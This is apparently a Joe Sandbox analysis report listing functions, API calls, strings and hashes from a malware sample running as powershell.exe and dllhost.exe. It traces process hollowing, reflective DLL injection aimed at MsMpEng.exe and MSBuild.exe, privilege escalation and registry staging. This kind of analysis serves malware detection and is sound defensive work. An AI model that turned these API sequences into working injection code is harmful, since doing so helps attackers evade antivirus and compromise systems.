Source File: 00000021.00000002.1714420529.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_400000_powershell.jbxd

Similarity

API ID: String$AllocFreeInitialize$CreateInitInstanceSecurityUninitializeVariant
String ID: $cnt-svc32
API String ID: 4184240511-548209266
Opcode ID: 9c4a86625b947a533870ca7b44a4e38c24d4bbb506b8e5284733e84da50932fe
Instruction ID: fe73214060e0a71e5cb08311afe73f66ef618dc69d1aaa4bc8de0f8b6e607afc
Opcode Fuzzy Hash: 9c4a86625b947a533870ca7b44a4e38c24d4bbb506b8e5284733e84da50932fe
Instruction Fuzzy Hash: 85314471A00218AFDB01EFA8CD88DAF7B7DEF49354B104069FA05FB190C6B5AD05CBA4

Function 00401986 Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 36
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

lstrlenW.KERNEL32(Get-Delegate,00000000,00402238), ref: 00401999
StrStrIW.SHLWAPI(00000000,Get-Delegate), ref: 004019B5
StrStrIW.SHLWAPI(?,Get-Delegate,75DB2EB0), ref: 004019D2

Strings

Get-Delegate, xrefs: 00401995, 004019B3, 004019C9

Memory Dump Source

Source File: 00000021.00000002.1714420529.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_400000_powershell.jbxd

Similarity

API ID: lstrlen
String ID: Get-Delegate
API String ID: 1659193697-1365458365
Opcode ID: e6e519078ed7ec1137922d894eaa91ee248194be5355f25f52c42e074d7245ff
Instruction ID: 00c31201c37e283d491a5759d1d7e9797cf0b304d52834bac4b81ed49e19cba9
Opcode Fuzzy Hash: e6e519078ed7ec1137922d894eaa91ee248194be5355f25f52c42e074d7245ff
Instruction Fuzzy Hash: 7EF05B71700218ABDB145BA59E48B9FB7FCAF44344F040077E505F3290EA749E01C664

Function 00401798 Relevance: 3.0, APIs: 2, Instructions: 3
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 004017A5: FindResourceA.KERNEL32(00000000,00000065,EXE), ref: 004017B5
Part of subcall function 004017A5: SizeofResource.KERNEL32(00000000,00000000,?,?,?,?,?,0040179D), ref: 004017C8
Part of subcall function 004017A5: LoadResource.KERNEL32(00000000,00000000,?,?,?,?,?,0040179D), ref: 004017DA
Part of subcall function 004017A5: LockResource.KERNEL32(00000000,?,?,?,?,?,0040179D), ref: 004017E5
Part of subcall function 004017A5: RegOpenKeyExW.ADVAPI32(80000002,SOFTWARE,00000000,000F013F,?,?,?,?,?,?,0040179D), ref: 00401801
Part of subcall function 004017A5: RegSetValueExW.KERNELBASE(?,$cnt-stager,00000000,00000003,00000000,00000000,?,?,?,?,?,0040179D), ref: 00401818

ExitProcess.KERNEL32 ref: 0040179E

Memory Dump Source

Source File: 00000021.00000002.1714420529.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_400000_powershell.jbxd

Similarity

API ID: Resource$ExitFindLoadLockOpenProcessSizeofValue
String ID:
API String ID: 3836967525-0
Opcode ID: 6f5a291add5b719a9ef9962163c102a842408bd3c615f02f78525d4f468f85bb
Instruction ID: 349935dfe58169e56b8de0d8f460e35c8f36df872e6f4d206b9f951cc53eac22
Opcode Fuzzy Hash: 6f5a291add5b719a9ef9962163c102a842408bd3c615f02f78525d4f468f85bb
Instruction Fuzzy Hash:

Non-executed Functions

Function 0040118E Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 10
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleA.KERNEL32(ntdll.dll,00401178,?), ref: 00401193
GetProcAddress.KERNEL32(00000000,RtlGetVersion), ref: 004011A3

Strings

ntdll.dll, xrefs: 0040118E
RtlGetVersion, xrefs: 0040119D

Memory Dump Source

Source File: 00000021.00000002.1714420529.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_400000_powershell.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: RtlGetVersion$ntdll.dll
API String ID: 1646373207-1489217083
Opcode ID: ee2441e5e750a461a1f1097b91d62800b241895c27a46cee72e654fece4d54b8
Instruction ID: 0863f5cf0c3234c6e1236f6f2d3f4997342a4c328dcd20e5af414fba7a7cf28b
Opcode Fuzzy Hash: ee2441e5e750a461a1f1097b91d62800b241895c27a46cee72e654fece4d54b8
Instruction Fuzzy Hash: D2C09B70F807006AFF151F709F0DB17295859487023540573B305F51D4DAFCC404D52C

Analysis Process: powershell.exePID: 6696, Parent PID: 932COMMON

Execution Graph

Execution Coverage:	8.6%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	14.2%
Total number of Nodes:	127
Total number of Limit Nodes:	6

Executed Functions

Function 00007FFAAC71DF98 Relevance: 1.7, APIs: 1, Instructions: 186
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000022.00000002.1799216017.00007FFAAC710000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC710000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_34_2_7ffaac710000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d4ac92a436164e8f4a12dde870803062a9e1fafc5a6d052b7e6f5fa0406365ea
Instruction ID: 0346e920cd35ce0019b6a2f148e9e5de3db3cc44f808549fa9a5162ecdb6d58a
Opcode Fuzzy Hash: d4ac92a436164e8f4a12dde870803062a9e1fafc5a6d052b7e6f5fa0406365ea
Instruction Fuzzy Hash: F751E77290E7858FFB16D768985A6E97FB0EF53210F0840BBC09DCB1A3E918D80987D1

Function 00007FFAAC720A3E Relevance: 1.6, APIs: 1, Instructions: 130
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtUnmapViewOfSection.NTDLL ref: 00007FFAAC720AFB

Memory Dump Source

Source File: 00000022.00000002.1799216017.00007FFAAC710000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC710000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_34_2_7ffaac710000_powershell.jbxd

Similarity

API ID: SectionUnmapView
String ID:
API String ID: 498011366-0
Opcode ID: 81b95588e2b2c4a3aa7fe87a2d7b858d1301a799458445bd084ed2ed377941eb
Instruction ID: c4346ae60bdb48e74be10266de1ede798b8b28816a53b621e2ff1df2e5da89fb
Opcode Fuzzy Hash: 81b95588e2b2c4a3aa7fe87a2d7b858d1301a799458445bd084ed2ed377941eb
Instruction Fuzzy Hash: 7E41453190D7888FEB19DB68D8467E97FF0EF57320F0442ABD049C71A3E665A446CB92

Function 00007FFAAC720C5D Relevance: 1.6, APIs: 1, Instructions: 130
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtWriteVirtualMemory.NTDLL ref: 00007FFAAC720D27

Memory Dump Source

Source File: 00000022.00000002.1799216017.00007FFAAC710000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC710000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_34_2_7ffaac710000_powershell.jbxd

Similarity

API ID: MemoryVirtualWrite
String ID:
API String ID: 3527976591-0
Opcode ID: 97da6507a6e1571d9977542a1892bfd6f6df9fae5d72885ce8eae3ccbb5a7b94
Instruction ID: 265e2a555ff316b7b5ab757430e62e998ba54d0e4af17cff53a33642c584b084
Opcode Fuzzy Hash: 97da6507a6e1571d9977542a1892bfd6f6df9fae5d72885ce8eae3ccbb5a7b94
Instruction Fuzzy Hash: 5B31E27190CB488FDB18DF58D885AF9BBF0FB5A321F04426ED04AD3652DB70A846CB81

Function 00007FFAAC71E078 Relevance: 1.6, APIs: 1, Instructions: 122
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtUnmapViewOfSection.NTDLL ref: 00007FFAAC720AFB

Memory Dump Source

Source File: 00000022.00000002.1799216017.00007FFAAC710000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC710000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_34_2_7ffaac710000_powershell.jbxd

Similarity

API ID: SectionUnmapView
String ID:
API String ID: 498011366-0
Opcode ID: 0696db72fcd863708bcd1b35c06cbeac016082793899b1aa47b71b1ebdfb7862
Instruction ID: 7e21141a0ba2a6cca5d9522d72d88b67d981a4ad807f8093a0b6fea669bb90ab
Opcode Fuzzy Hash: 0696db72fcd863708bcd1b35c06cbeac016082793899b1aa47b71b1ebdfb7862
Instruction Fuzzy Hash: A531377190D7488FEB58CB58980A7F9BBF0EB56310F04416FD04ED7166EA34E849C791

Function 00007FFAAC720FE4 Relevance: 1.6, APIs: 1, Instructions: 115nativethreadCOMMON

Download Yara Rule

APIs

NtResumeThread.NTDLL ref: 00007FFAAC721095

Memory Dump Source

Source File: 00000022.00000002.1799216017.00007FFAAC710000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC710000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_34_2_7ffaac710000_powershell.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: ff28a0e0d853c751d65e0a772db21b8954083a2742bd6fa0352bf4ad0bea5fc5
Instruction ID: 4ee922f333e52836a335a78d39b67da4ee887332c95873811ce154174f4d3384
Opcode Fuzzy Hash: ff28a0e0d853c751d65e0a772db21b8954083a2742bd6fa0352bf4ad0bea5fc5
Instruction Fuzzy Hash: 5031D37190C64C8FDB58DF98D845BEABBF1EF56311F04416BD009D3692DB70A846CB91

Function 00007FFAAC720F20 Relevance: 1.6, APIs: 1, Instructions: 98nativethreadCOMMON

Download Yara Rule

APIs

NtSetContextThread.NTDLL ref: 00007FFAAC720FAB

Memory Dump Source

Source File: 00000022.00000002.1799216017.00007FFAAC710000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC710000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_34_2_7ffaac710000_powershell.jbxd

Similarity

API ID: ContextThread
String ID:
API String ID: 1591575202-0
Opcode ID: 6b2430c99427e90a71f5e3f6fe8b072a7f4c679f2fe57a8cc61fe4faee1c59e2
Instruction ID: 791a189943eca45bf29e06257fe859ce274d38b88a1bbc2bbc3db37c5c88a1d5
Opcode Fuzzy Hash: 6b2430c99427e90a71f5e3f6fe8b072a7f4c679f2fe57a8cc61fe4faee1c59e2
Instruction Fuzzy Hash: F421B17090CA4C8FDB58DF58D8467E9BBF0EB66321F04416FD04DC3652D674A846CB91

Function 00007FFAAC9977E9 Relevance: 1.2, Instructions: 1239COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000022.00000002.1806474232.00007FFAAC990000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC990000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_34_2_7ffaac990000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d75fb0e3fcc897aa5c798d5ef63c07310698cacd9d4e37baa2eeb117f7760264
Instruction ID: e564006fccbb2e21721dd80877179c1a15ca3e67fb22c77fbc843d7b3afcc906
Opcode Fuzzy Hash: d75fb0e3fcc897aa5c798d5ef63c07310698cacd9d4e37baa2eeb117f7760264
Instruction Fuzzy Hash: BF722566A0EB898FF7A6976848556B57BE0EF97210B0841FBD04DC71A3ED1DEC09C381

Function 00007FFAAC720221 Relevance: 2.4, APIs: 1, Instructions: 933
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNELBASE ref: 00007FFAAC72093D

Memory Dump Source

Source File: 00000022.00000002.1799216017.00007FFAAC710000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC710000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_34_2_7ffaac710000_powershell.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: e407db53c9b9478ea91897804eee232b053cc8031d729639f497c4951e0b57cf
Instruction ID: 1526a4642fa35e58147ba2e9271264902515f8f04688355a28c3a1dac314f447
Opcode Fuzzy Hash: e407db53c9b9478ea91897804eee232b053cc8031d729639f497c4951e0b57cf
Instruction Fuzzy Hash: EED10630518B898FEB64DF2CD8467F57BE0FF56311F14826AD88DC7292EA3494458BD2

Function 00007FFAAC71EAFA Relevance: 1.8, APIs: 1, Instructions: 257
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileMappingW.KERNELBASE ref: 00007FFAAC71ECA6

Memory Dump Source

Source File: 00000022.00000002.1799216017.00007FFAAC710000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC710000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_34_2_7ffaac710000_powershell.jbxd

Similarity

API ID: CreateFileMapping
String ID:
API String ID: 524692379-0
Opcode ID: 09f1eb218ab504d005c2aa1a669f923198eb8ef1a0afd2d254c3dd7f90aa5884
Instruction ID: 91a3bd265b80933149b1781534679d88a2f84581355f066e1d68273472d3a741
Opcode Fuzzy Hash: 09f1eb218ab504d005c2aa1a669f923198eb8ef1a0afd2d254c3dd7f90aa5884
Instruction Fuzzy Hash: 7D71063051CB8D8FEB59DF28D8467E47BE1FB56310F14426AE88DC32A2DA75E8458B81

Function 00007FFAAC71E8AC Relevance: 1.7, APIs: 1, Instructions: 225
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileA.KERNELBASE ref: 00007FFAAC71EA39

Memory Dump Source

Source File: 00000022.00000002.1799216017.00007FFAAC710000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC710000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_34_2_7ffaac710000_powershell.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: ec07281f9a09426762e7fb92d862ee00289e5243a9ed38913fbb23105a719330
Instruction ID: 8e2b1bed2ca4a4e7013e670a16dbd62f1eb56204a8cd2bf281e46f131534d928
Opcode Fuzzy Hash: ec07281f9a09426762e7fb92d862ee00289e5243a9ed38913fbb23105a719330
Instruction Fuzzy Hash: B761EA30518B4D8FEB58EF28D8467E477E1FB59310F10426AE85DC7292DA74E8458BC2

Function 00007FFAAC71ED66 Relevance: 1.6, APIs: 1, Instructions: 145
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

MapViewOfFile.KERNELBASE ref: 00007FFAAC71EE43

Memory Dump Source

Source File: 00000022.00000002.1799216017.00007FFAAC710000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC710000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_34_2_7ffaac710000_powershell.jbxd

Similarity

API ID: FileView
String ID:
API String ID: 3314676101-0
Opcode ID: 83c05f1d66686a864baf23dc1e5490b9805bb32cc202c35575af1cdf7a9c2710
Instruction ID: 9a2cb2881fca295363e435160dc76be419ac51e16f3559b19b0e9bf5449d7898
Opcode Fuzzy Hash: 83c05f1d66686a864baf23dc1e5490b9805bb32cc202c35575af1cdf7a9c2710
Instruction Fuzzy Hash: 6741173190CB889FEB0DDB68D8066F9BBF0FF56321F14426ED099C31A2DA65B446C791

Function 00007FFAAC71E7CB Relevance: 1.6, APIs: 1, Instructions: 114COMMON

Download Yara Rule

APIs

K32GetModuleInformation.KERNEL32 ref: 00007FFAAC71E862

Memory Dump Source

Source File: 00000022.00000002.1799216017.00007FFAAC710000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC710000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_34_2_7ffaac710000_powershell.jbxd

Similarity

API ID: InformationModule
String ID:
API String ID: 3425974696-0
Opcode ID: 4dd8f04d0077a926c6fd3f501cb00c65326c099122e8a4bd3c41c05cd33be24b
Instruction ID: 802bc4ab85cbb005519aec88bf0d8e8d43382bff7b581e9fc390e2c289fac81d
Opcode Fuzzy Hash: 4dd8f04d0077a926c6fd3f501cb00c65326c099122e8a4bd3c41c05cd33be24b
Instruction Fuzzy Hash: FA31B37191CA1C9FDB18DB9CD8496F9BBE1EBA9322F00423FD049D3651DB70A8568B81

Function 00007FFAAC7E2E71 Relevance: .1, Instructions: 85COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000022.00000002.1800930233.00007FFAAC7E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC7E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_34_2_7ffaac7e0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 563668fb975340751776133a3de7469730f36aa684117b48d0c237b7165c4db0
Instruction ID: abdf20d348b9089f3be6b55d5dad38e2d33af706e828ad0c02774862b0a24d22
Opcode Fuzzy Hash: 563668fb975340751776133a3de7469730f36aa684117b48d0c237b7165c4db0
Instruction Fuzzy Hash: 0621F587D0FBDA8FF395A72858592A85BD0EF96260B6841FAD48DC71C3DE189C0D4391

Function 00007FFAAC997DA4 Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000022.00000002.1806474232.00007FFAAC990000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC990000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_34_2_7ffaac990000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 76cfb94e3a1166ae65ab292385bb804962b0dfd2502289240d91385e4b853324
Instruction ID: e07dc9c384c9202b7bed84d3fee4b46fa046ea15593a9914d7b6e96e27ceccb7
Opcode Fuzzy Hash: 76cfb94e3a1166ae65ab292385bb804962b0dfd2502289240d91385e4b853324
Instruction Fuzzy Hash: 6BF09617F1EA298AF7B5926C64563F853C2DF99220B5986B3D50DC31F5DC0EEC4902C4

Non-executed Functions

Function 00007FFAAC7E88BE Relevance: 5.1, Strings: 4, Instructions: 144COMMON

Download Yara Rule

Strings

x6?S, xrefs: 00007FFAAC7E89D8
x6?S, xrefs: 00007FFAAC7E8930
x6?S, xrefs: 00007FFAAC7E8988
P7?S, xrefs: 00007FFAAC7E895E

Memory Dump Source

Source File: 00000022.00000002.1800930233.00007FFAAC7E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC7E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_34_2_7ffaac7e0000_powershell.jbxd

Similarity

API ID:
String ID: P7?S$x6?S$x6?S$x6?S
API String ID: 0-2035566449
Opcode ID: 090ae2ed86e64811c747b2794053428fa5bfc6b8eaa4d545316553f57f39ba30
Instruction ID: dfefe0f3f8201ca7889f9e774da4767619a326cb3d6e4ff8b87eb3e97da5661b
Opcode Fuzzy Hash: 090ae2ed86e64811c747b2794053428fa5bfc6b8eaa4d545316553f57f39ba30
Instruction Fuzzy Hash: D2414E3131CA448FDF99EA18D455EA573E1EBA9314F14445DD08ACB2A2CE22EC45CB81

Function 00007FFAAC7E990E Relevance: 5.1, Strings: 4, Instructions: 144COMMON

Download Yara Rule

Strings

x6?S, xrefs: 00007FFAAC7E9A28
P7?S, xrefs: 00007FFAAC7E99AE
x6?S, xrefs: 00007FFAAC7E9980
x6?S, xrefs: 00007FFAAC7E99D8

Memory Dump Source

Source File: 00000022.00000002.1800930233.00007FFAAC7E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC7E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_34_2_7ffaac7e0000_powershell.jbxd

Similarity

API ID:
String ID: P7?S$x6?S$x6?S$x6?S
API String ID: 0-2035566449
Opcode ID: 090ae2ed86e64811c747b2794053428fa5bfc6b8eaa4d545316553f57f39ba30
Instruction ID: c1f8faa4fc3298cfe9dceb2f045da704fc92805df85e1c8a1df8d69dc83cfd01
Opcode Fuzzy Hash: 090ae2ed86e64811c747b2794053428fa5bfc6b8eaa4d545316553f57f39ba30
Instruction Fuzzy Hash: 22413F3131CE448FDF99EA18D455EA577E1EFA9314F14445DD08ACB2A2DE32EC45CB82

Analysis Process: dllhost.exePID: 3268, Parent PID: 556COMMON

Execution Graph

Execution Coverage:	2.7%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	6.4%
Total number of Nodes:	1885
Total number of Limit Nodes:	28

Executed Functions

Function 0000000140002D4C Relevance: 91.3, APIs: 39, Strings: 13, Instructions: 269
registrymemorythreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

OpenMutexW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D41), ref: 0000000140002D6C
Sleep.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D41), ref: 0000000140002D7C
CloseHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D41), ref: 0000000140002D87
GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D41), ref: 0000000140002DA5
OpenProcess.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D41), ref: 0000000140002DB5
OpenProcessToken.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D41), ref: 0000000140002DCF
LookupPrivilegeValueW.ADVAPI32 ref: 0000000140002DE6
AdjustTokenPrivileges.KERNELBASE ref: 0000000140002E20
GetLastError.KERNEL32 ref: 0000000140002E2A
CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D41), ref: 0000000140002E33
RegOpenKeyExW.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D41), ref: 0000000140002E5C
RegQueryValueExW.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D41), ref: 0000000140002E8C
RegQueryValueExW.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D41), ref: 0000000140002EBC
GetProcessHeap.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D41), ref: 0000000140002ED0
HeapAlloc.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D41), ref: 0000000140002EDE
GetProcessHeap.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D41), ref: 0000000140002EF1
HeapAlloc.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D41), ref: 0000000140002EFF
RegQueryValueExW.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D41), ref: 0000000140002F2E
RegQueryValueExW.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D41), ref: 0000000140002F5E
RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D41), ref: 0000000140002F70
GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D41), ref: 0000000140002F76

Part of subcall function 000000014000200C: GetProcessHeap.KERNEL32(?,?,00000000,0000000140002F83), ref: 0000000140002021
Part of subcall function 000000014000200C: HeapAlloc.KERNEL32(?,?,00000000,0000000140002F83), ref: 0000000140002032
Part of subcall function 000000014000200C: OpenProcess.KERNEL32 ref: 0000000140002079
Part of subcall function 000000014000200C: TerminateProcess.KERNEL32 ref: 000000014000208C
Part of subcall function 000000014000200C: CloseHandle.KERNEL32 ref: 0000000140002095
Part of subcall function 000000014000200C: GetProcessHeap.KERNEL32 ref: 00000001400020A5

RegCreateKeyExW.KERNELBASE ref: 0000000140002FB2
ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32 ref: 0000000140002FD9
RegSetKeySecurity.KERNELBASE ref: 0000000140002FF2
LocalFree.KERNEL32 ref: 0000000140002FFC
RegCreateKeyExW.KERNELBASE ref: 0000000140003032
GetCurrentProcessId.KERNEL32 ref: 000000014000303C
RegSetValueExW.KERNELBASE ref: 0000000140003063
RegCloseKey.KERNELBASE ref: 000000014000306D
RegCloseKey.ADVAPI32 ref: 0000000140003077
CreateThread.KERNELBASE ref: 0000000140003098
GetProcessHeap.KERNEL32 ref: 000000014000309E
HeapAlloc.KERNEL32 ref: 00000001400030AD
CreateThread.KERNELBASE ref: 00000001400030DB
CreateThread.KERNELBASE ref: 00000001400030FC
ShellExecuteW.SHELL32 ref: 0000000140003136
GetProcessHeap.KERNEL32 ref: 0000000140003196
HeapFree.KERNEL32 ref: 00000001400031A4
SleepEx.KERNELBASE ref: 00000001400031AD

Strings

$cnt-dll64, xrefs: 0000000140002EAA, 0000000140002F43
SeDebugPrivilege, xrefs: 0000000140002DDF
Global\Onimai_3637bd27-1800-4db6-94b5-e49ce9967b2d, xrefs: 0000000140002D5E
kernel32.dll, xrefs: 0000000140002D99
SOFTWARE, xrefs: 0000000140002E52
ntdll.dll, xrefs: 0000000140002D8D
svc64, xrefs: 0000000140003046
$cnt-dll32, xrefs: 0000000140002E7A, 0000000140002F09
?, xrefs: 0000000140003026
open, xrefs: 0000000140003117
SOFTWARE\$cnt-config, xrefs: 0000000140002F91
D:(A;OICI;GA;;;AU)(A;OICI;GA;;;BA), xrefs: 0000000140002FD2
pid, xrefs: 000000014000300F

Memory Dump Source

Source File: 00000025.00000002.2525914365.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000025.00000002.2525086326.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2526696098.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2527566343.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_37_2_140000000_dllhost.jbxd

Similarity

API ID: Process$Heap$CloseValue$CreateOpen$AllocQuery$CurrentHandleSecurityThread$DescriptorFreeSleepToken$AdjustConvertErrorExecuteLastLocalLookupMutexPrivilegePrivilegesShellStringTerminate
String ID: $cnt-dll32$$cnt-dll64$?$D:(A;OICI;GA;;;AU)(A;OICI;GA;;;BA)$Global\Onimai_3637bd27-1800-4db6-94b5-e49ce9967b2d$SOFTWARE$SOFTWARE\$cnt-config$SeDebugPrivilege$kernel32.dll$ntdll.dll$open$pid$svc64
API String ID: 2725631067-3108054586
Opcode ID: 19d6d12776ca0f2fbbe8990d885d79cc61f5dade11bb5855dcfccad145e38bad
Instruction ID: 11cca5996524c372b97bd826982d2baaf99c89fd62df68e9b01c6f7d22bdc91e
Opcode Fuzzy Hash: 19d6d12776ca0f2fbbe8990d885d79cc61f5dade11bb5855dcfccad145e38bad
Instruction Fuzzy Hash: 8DD1E0F6600A4086EB26DF22F8547DA27A5FB8CBD9F404116FB4A43A79DF38C589C744

Function 0000000140001868 Relevance: 58.0, APIs: 29, Strings: 4, Instructions: 287
memorystringnativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

OpenProcess.KERNEL32 ref: 000000014000189E
IsWow64Process.KERNEL32 ref: 00000001400018BA
CloseHandle.KERNELBASE ref: 00000001400018DE
OpenProcess.KERNEL32 ref: 0000000140001939
OpenProcess.KERNEL32 ref: 0000000140001958
K32GetModuleFileNameExW.KERNEL32 ref: 0000000140001979
PathFindFileNameW.SHLWAPI ref: 0000000140001987
lstrlenW.KERNEL32 ref: 0000000140001993
StrCpyW.SHLWAPI ref: 00000001400019AA
CloseHandle.KERNEL32 ref: 00000001400019B6
StrCmpIW.SHLWAPI ref: 00000001400019EA
NtQueryInformationProcess.NTDLL ref: 0000000140001A1B
OpenProcessToken.ADVAPI32 ref: 0000000140001A43
GetTokenInformation.KERNELBASE ref: 0000000140001A6F
GetLastError.KERNEL32 ref: 0000000140001A79
LocalAlloc.KERNEL32 ref: 0000000140001A8C
GetTokenInformation.KERNELBASE ref: 0000000140001AB8
GetSidSubAuthorityCount.ADVAPI32 ref: 0000000140001AC5
GetSidSubAuthority.ADVAPI32 ref: 0000000140001AD4
LocalFree.KERNEL32 ref: 0000000140001AEC
CloseHandle.KERNEL32 ref: 0000000140001B00
StrStrA.SHLWAPI ref: 0000000140001BAB
VirtualAllocEx.KERNEL32 ref: 0000000140001C15
WriteProcessMemory.KERNELBASE ref: 0000000140001C38
WaitForSingleObject.KERNEL32 ref: 0000000140001C79
GetExitCodeThread.KERNEL32 ref: 0000000140001C8F
VirtualFreeEx.KERNELBASE ref: 0000000140001CB1
CloseHandle.KERNELBASE ref: 0000000140001CC2
CloseHandle.KERNEL32 ref: 0000000140001CCB

Strings

@, xrefs: 0000000140001C08
MsMpEng.exe, xrefs: 00000001400019C1
ReflectiveDllMain, xrefs: 0000000140001BA1
MSBuild.exe, xrefs: 00000001400019D4

Memory Dump Source

Source File: 00000025.00000002.2525914365.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000025.00000002.2525086326.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2526696098.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2527566343.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_37_2_140000000_dllhost.jbxd

Similarity

API ID: Process$CloseHandle$Open$InformationToken$AllocAuthorityFileFreeLocalNameVirtual$CodeCountErrorExitFindLastMemoryModuleObjectPathQuerySingleThreadWaitWow64Writelstrlen
String ID: @$MSBuild.exe$MsMpEng.exe$ReflectiveDllMain
API String ID: 2456419452-2628171563
